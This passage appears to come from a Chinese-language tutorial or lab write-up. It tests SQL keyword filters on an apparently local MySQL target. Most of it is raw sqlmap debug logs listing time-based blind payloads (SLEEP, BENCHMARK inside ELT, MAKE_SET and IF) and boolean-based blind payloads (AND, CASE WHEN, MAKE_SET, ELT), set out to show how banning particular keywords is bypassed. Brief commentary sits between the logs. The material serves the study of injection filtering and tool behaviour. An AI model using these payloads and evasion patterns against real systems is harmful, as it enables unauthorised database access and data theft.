ELT(33=77,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(77=59,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(59=59,SLEEP(5))[23:09:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:20] [PAYLOAD] ELT(77 59,SLEEP(5))[23:09:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:20] [PAYLOAD] ELT(18=18,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(18=49,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(18=57,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(57=49,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(49=49,SLEEP(5))[23:09:30] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:30] [PAYLOAD] ELT(57 49,SLEEP(5))[23:09:31] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:31] [PAYLOAD] ELT(30=30,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(30=34,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(30=71,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(71=34,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(34=34,SLEEP(5))[23:09:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:41] [PAYLOAD] ELT(71 34,SLEEP(5))[23:09:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:41] [PAYLOAD] ELT(19=19,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(19=30,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(19=55,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(55=30,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(30=30,SLEEP(5))[23:09:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:51] [PAYLOAD] ELT(55 30,SLEEP(5))[23:09:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:51] [DEBUG] checking for parameter length constrainting mechanisms[23:09:51] [PAYLOAD] ELT(9111=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9111,SLEEP(5))[23:09:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:56] [DEBUG] checking for filtered characters[23:09:56] [PAYLOAD] ELT(9294>9293,SLEEP(5))[23:10:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:10:02] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1056 HTTP(s) requests:---Parameter: id (GET)    Type: AND/OR time-based blind    Title: MySQL time-based blind - Parameter replace (ELT)    Payload: id=ELT(1874=1874,SLEEP(5))    Vector: ELT([INFERENCE],SLEEP([SLEEPTIME]))---

假如禁掉的是AND,OR，RLIKE,CASE，SELECT，ELT字符串

MAKE_SET(bits,str1,str2,…)返回一个设定值(含子字符串分隔字符串","字符)，在设置位的相应位的字符串。str1对应于位0，str2到第1位，依此类推。在str1，str1有NULL值，…那么不添加到结果

[23:13:17] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:13:17] [PAYLOAD] MAKE_SET(54=54,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(54=83,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(54=97,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(97=83,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(83=83,SLEEP(5))[23:13:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:27] [PAYLOAD] MAKE_SET(97 83,SLEEP(5))[23:13:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:28] [PAYLOAD] MAKE_SET(23=23,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(23=39,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(23=50,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(50=39,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(39=39,SLEEP(5))[23:13:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:38] [PAYLOAD] MAKE_SET(50 39,SLEEP(5))[23:13:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:38] [PAYLOAD] MAKE_SET(24=24,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(24=69,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(24=95,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(95=69,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(69=69,SLEEP(5))[23:13:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:48] [PAYLOAD] MAKE_SET(95 69,SLEEP(5))[23:13:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:48] [PAYLOAD] MAKE_SET(38=38,SLEEP(5))[23:13:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:53] [PAYLOAD] MAKE_SET(38=64,SLEEP(5))[23:13:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:53] [PAYLOAD] MAKE_SET(38=88,SLEEP(5))[23:13:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:54] [PAYLOAD] MAKE_SET(88=64,SLEEP(5))[23:13:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:54] [PAYLOAD] MAKE_SET(64=64,SLEEP(5))[23:13:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:59] [PAYLOAD] MAKE_SET(88 64,SLEEP(5))[23:13:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:59] [PAYLOAD] MAKE_SET(90=90,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(90=92,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(90=96,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(96=92,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(92=92,SLEEP(5))[23:14:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:09] [PAYLOAD] MAKE_SET(96 92,SLEEP(5))[23:14:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:09] [DEBUG] checking for parameter length constrainting mechanisms[23:14:09] [PAYLOAD] MAKE_SET(4328=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4328,SLEEP(5))[23:14:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:14] [DEBUG] checking for filtered characters[23:14:14] [PAYLOAD] MAKE_SET(2779>2778,SLEEP(5))[23:14:19] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:14:19] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1057 HTTP(s) requests:---Parameter: id (GET)    Type: AND/OR time-based blind    Title: MySQL time-based blind - Parameter replace (MAKE_SET)    Payload: id=MAKE_SET(3840=3840,SLEEP(5))    Vector: MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))---

假如禁掉的是AND,OR，RLIKE,CASE，SELECT，ELT，MAKE_SET字符串，就会报错

让我们回归到初始，禁止SLEEP字符串

BENCHMARK(count,expr) 函数重复count次执行表达式expr，它可以用于计时MySQL处理表达式有多快，结果值总是0。

[23:31:34] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:31:34] [PAYLOAD] 1 AND 8586=IF((62=62),BENCHMARK(5000000,MD5(0x49787364)),8586)[23:31:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:35] [PAYLOAD] 1 AND 3175=IF((62=86),BENCHMARK(5000000,MD5(0x616f6b74)),3175)[23:31:35] [PAYLOAD] 1 AND 1368=IF((62=98),BENCHMARK(5000000,MD5(0x66457065)),1368)[23:31:35] [PAYLOAD] 1 AND 2362=IF((98=86),BENCHMARK(5000000,MD5(0x4e6f5a6a)),2362)[23:31:35] [PAYLOAD] 1 AND 5234=IF((86=86),BENCHMARK(5000000,MD5(0x6d4e6d49)),5234)[23:31:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:36] [PAYLOAD] 1 AND 5792=IF((98 86),BENCHMARK(5000000,MD5(0x75735371)),5792)[23:31:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:36] [PAYLOAD] 1 AND 7985=IF((14=14),BENCHMARK(5000000,MD5(0x78417065)),7985)[23:31:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:37] [PAYLOAD] 1 AND 5476=IF((14=53),BENCHMARK(5000000,MD5(0x7267436f)),5476)[23:31:37] [PAYLOAD] 1 AND 2433=IF((14=76),BENCHMARK(5000000,MD5(0x52756b6f)),2433)[23:31:37] [PAYLOAD] 1 AND 2054=IF((76=53),BENCHMARK(5000000,MD5(0x6c4c6e66)),2054)[23:31:37] [PAYLOAD] 1 AND 6832=IF((53=53),BENCHMARK(5000000,MD5(0x6e507a50)),6832)[23:31:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:38] [PAYLOAD] 1 AND 4267=IF((76 53),BENCHMARK(5000000,MD5(0x6a766347)),4267)[23:31:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:38] [PAYLOAD] 1 AND 6289=IF((22=22),BENCHMARK(5000000,MD5(0x5258624a)),6289)[23:31:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:39] [PAYLOAD] 1 AND 7746=IF((22=62),BENCHMARK(5000000,MD5(0x4f597465)),7746)[23:31:39] [PAYLOAD] 1 AND 1055=IF((22=64),BENCHMARK(5000000,MD5(0x4f485952)),1055)[23:31:39] [PAYLOAD] 1 AND 7423=IF((64=62),BENCHMARK(5000000,MD5(0x6d64586e)),7423)[23:31:39] [PAYLOAD] 1 AND 1586=IF((62=62),BENCHMARK(5000000,MD5(0x71696243)),1586)[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:40] [PAYLOAD] 1 AND 9110=IF((64 62),BENCHMARK(5000000,MD5(0x4f7a5241)),9110)[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:40] [PAYLOAD] 1 AND 4776=IF((12=12),BENCHMARK(5000000,MD5(0x596c7457)),4776)[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:40] [PAYLOAD] 1 AND 8424=IF((12=22),BENCHMARK(5000000,MD5(0x457a486e)),8424)[23:31:40] [PAYLOAD] 1 AND 2962=IF((12=32),BENCHMARK(5000000,MD5(0x6d567677)),2962)[23:31:40] [PAYLOAD] 1 AND 7592=IF((32=22),BENCHMARK(5000000,MD5(0x6e4b6746)),7592)[23:31:41] [PAYLOAD] 1 AND 2975=IF((22=22),BENCHMARK(5000000,MD5(0x416a6f6a)),2975)[23:31:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:41] [PAYLOAD] 1 AND 2138=IF((32 22),BENCHMARK(5000000,MD5(0x7342766c)),2138)[23:31:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:42] [PAYLOAD] 1 AND 9458=IF((47=47),BENCHMARK(5000000,MD5(0x4458447a)),9458)[23:31:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:43] [PAYLOAD] 1 AND 8078=IF((47=48),BENCHMARK(5000000,MD5(0x4652454b)),8078)[23:31:43] [PAYLOAD] 1 AND 5384=IF((47=76),BENCHMARK(5000000,MD5(0x4f6d706e)),5384)[23:31:43] [PAYLOAD] 1 AND 9112=IF((76=48),BENCHMARK(5000000,MD5(0x764f626b)),9112)[23:31:43] [PAYLOAD] 1 AND 9116=IF((48=48),BENCHMARK(5000000,MD5(0x6873764a)),9116)[23:31:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:44] [PAYLOAD] 1 AND 2917=IF((76 48),BENCHMARK(5000000,MD5(0x557a6c62)),2917)[23:31:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:44] [DEBUG] checking for parameter length constrainting mechanisms[23:31:44] [PAYLOAD] 1 AND 2065=IF((9201=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9201),BENCHMARK(5000000,MD5(0x57724358)),2065)[23:31:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:45] [DEBUG] checking for filtered characters[23:31:45] [PAYLOAD] 1 AND 1617=IF((3411>3410),BENCHMARK(5000000,MD5(0x56496575)),1617)[23:31:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:31:45] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 437 HTTP(s) requests:---Parameter: id (GET)    Type: AND/OR time-based blind    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)    Payload: id=1 AND 4803=BENCHMARK(5000000,MD5(0x44487655))    Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])---

当我禁止SLEEP,BENCHMARK,就会失败，说明基于时间注入就是这两个函数之一控制的

基于布尔型注入（B）

默认情况，由AND进行判断结果是否相等

[23:38:26] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:38:26] [PAYLOAD] 1 AND 33=33[23:38:26] [PAYLOAD] 1 AND 33=96[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 96=76[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 76=76[23:38:26] [PAYLOAD] 1 AND 96 76[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 70=70[23:38:26] [PAYLOAD] 1 AND 70=96[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 96=81[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 81=81[23:38:26] [PAYLOAD] 1 AND 96 81[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 33=33[23:38:26] [PAYLOAD] 1 AND 33=67[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 67=52[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 52=52[23:38:27] [PAYLOAD] 1 AND 67 52[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 16=16[23:38:27] [PAYLOAD] 1 AND 16=96[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 96=64[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 64=64[23:38:27] [PAYLOAD] 1 AND 96 64[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 38=38[23:38:27] [PAYLOAD] 1 AND 38=71[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 71=57[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 57=57[23:38:27] [PAYLOAD] 1 AND 71 57[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [DEBUG] checking for parameter length constrainting mechanisms[23:38:27] [PAYLOAD] 1 AND 9527=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9527[23:38:27] [DEBUG] checking for filtered characters[23:38:27] [PAYLOAD] 1 AND (1709)=1709[23:38:27] [PAYLOAD] 1 AND 1710>1709GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:38:27] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1 AND 4833=4833    Vector: AND [INFERENCE]---

禁掉AND

就会使用case when then语句进行查询

[23:41:16] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:41:16] [PAYLOAD] (CASE WHEN (21=21) THEN 1 ELSE 5844*(SELECT 5844 FROM DUAL UNION SELECT 7325 FROM DUAL) END)[23:41:16] [PAYLOAD] (CASE WHEN (21=64) THEN 1 ELSE 9219*(SELECT 9219 FROM DUAL UNION SELECT 1744 FROM DUAL) END)[23:41:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (64=59) THEN 1 ELSE 8110*(SELECT 8110 FROM DUAL UNION SELECT 2379 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (59=59) THEN 1 ELSE 7130*(SELECT 7130 FROM DUAL UNION SELECT 4552 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (64 59) THEN 1 ELSE 3780*(SELECT 3780 FROM DUAL UNION SELECT 9899 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (60=60) THEN 1 ELSE 9062*(SELECT 9062 FROM DUAL UNION SELECT 4510 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (60=94) THEN 1 ELSE 5004*(SELECT 5004 FROM DUAL UNION SELECT 2949 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (94=82) THEN 1 ELSE 1182*(SELECT 1182 FROM DUAL UNION SELECT 7567 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (82=82) THEN 1 ELSE 8876*(SELECT 8876 FROM DUAL UNION SELECT 5433 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (94 82) THEN 1 ELSE 5776*(SELECT 5776 FROM DUAL UNION SELECT 9763 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (34=34) THEN 1 ELSE 4935*(SELECT 4935 FROM DUAL UNION SELECT 5480 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (34=82) THEN 1 ELSE 3865*(SELECT 3865 FROM DUAL UNION SELECT 1281 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (82=36) THEN 1 ELSE 8529*(SELECT 8529 FROM DUAL UNION SELECT 9064 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (36=36) THEN 1 ELSE 3222*(SELECT 3222 FROM DUAL UNION SELECT 9853 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (82 36) THEN 1 ELSE 5873*(SELECT 5873 FROM DUAL UNION SELECT 6193 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (14=14) THEN 1 ELSE 4089*(SELECT 4089 FROM DUAL UNION SELECT 2387 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (14=40) THEN 1 ELSE 8087*(SELECT 8087 FROM DUAL UNION SELECT 6170 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (40=37) THEN 1 ELSE 5070*(SELECT 5070 FROM DUAL UNION SELECT 7441 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (37=37) THEN 1 ELSE 2768*(SELECT 2768 FROM DUAL UNION SELECT 7753 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (40 37) THEN 1 ELSE 1946*(SELECT 1946 FROM DUAL UNION SELECT 9529 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (31=31) THEN 1 ELSE 5197*(SELECT 5197 FROM DUAL UNION SELECT 2014 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (31=75) THEN 1 ELSE 9154*(SELECT 9154 FROM DUAL UNION SELECT 4722 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (75=48) THEN 1 ELSE 9742*(SELECT 9742 FROM DUAL UNION SELECT 5455 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (48=48) THEN 1 ELSE 7816*(SELECT 7816 FROM DUAL UNION SELECT 2905 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (75 48) THEN 1 ELSE 1589*(SELECT 1589 FROM DUAL UNION SELECT 7267 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [DEBUG] checking for parameter length constrainting mechanisms[23:41:18] [PAYLOAD] (CASE WHEN (9454=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9454) THEN 1 ELSE 6518*(SELECT 6518 FROM DUAL UNION SELECT 2474 FROM DUAL) END)[23:41:18] [DEBUG] checking for filtered characters[23:41:18] [PAYLOAD] (CASE WHEN ((1557)=1557) THEN 1 ELSE 9993*(SELECT 9993 FROM DUAL UNION SELECT 7747 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (1558>1557) THEN 1 ELSE 8687*(SELECT 8687 FROM DUAL UNION SELECT 8396 FROM DUAL) END)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:41:18] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 655 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (DUAL) (original value)    Payload: id=(CASE WHEN (4416=4416) THEN 1 ELSE 4416*(SELECT 4416 FROM DUAL UNION SELECT 9695 FROM DUAL) END)    Vector: (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)---

禁掉AND，CASE

sqlmap就会用make_set函数

[09:08:50] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:08:50] [PAYLOAD] MAKE_SET(36=36,1)[09:08:50] [PAYLOAD] MAKE_SET(36=97,1)[09:08:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:50] [PAYLOAD] MAKE_SET(97=52,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(52=52,1)[09:08:51] [PAYLOAD] MAKE_SET(97 52,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(47=47,1)[09:08:51] [PAYLOAD] MAKE_SET(47=85,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(85=64,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(64=64,1)[09:08:51] [PAYLOAD] MAKE_SET(85 64,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(59=59,1)[09:08:51] [PAYLOAD] MAKE_SET(59=76,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(76=62,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(62=62,1)[09:08:51] [PAYLOAD] MAKE_SET(76 62,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(13=13,1)[09:08:51] [PAYLOAD] MAKE_SET(13=18,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(18=16,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(16=16,1)[09:08:51] [PAYLOAD] MAKE_SET(18 16,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(78=78,1)[09:08:51] [PAYLOAD] MAKE_SET(78=87,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(87=83,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(83=83,1)[09:08:52] [PAYLOAD] MAKE_SET(87 83,1)[09:08:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:52] [DEBUG] checking for parameter length constrainting mechanisms[09:08:52] [PAYLOAD] MAKE_SET(4909=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4909,1)[09:08:52] [DEBUG] checking for filtered characters[09:08:52] [PAYLOAD] MAKE_SET((2778)=2778,1)[09:08:52] [PAYLOAD] MAKE_SET(2779>2778,1)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:08:52] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1542 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)    Payload: id=MAKE_SET(3858=3858,1)    Vector: MAKE_SET([INFERENCE],[ORIGVALUE])---

禁掉AND，CASE，MAKE_SET

使用ELT函数

[09:11:52] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:11:52] [PAYLOAD] ELT(47=47,1)[09:11:52] [PAYLOAD] ELT(47=95,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(95=75,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(75=75,1)[09:11:52] [PAYLOAD] ELT(95 75,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(73=73,1)[09:11:52] [PAYLOAD] ELT(73=94,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(94=86,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(86=86,1)[09:11:52] [PAYLOAD] ELT(94 86,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(45=45,1)[09:11:52] [PAYLOAD] ELT(45=95,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(95=92,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(92=92,1)[09:11:52] [PAYLOAD] ELT(95 92,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(15=15,1)[09:11:52] [PAYLOAD] ELT(15=91,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(91=84,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] 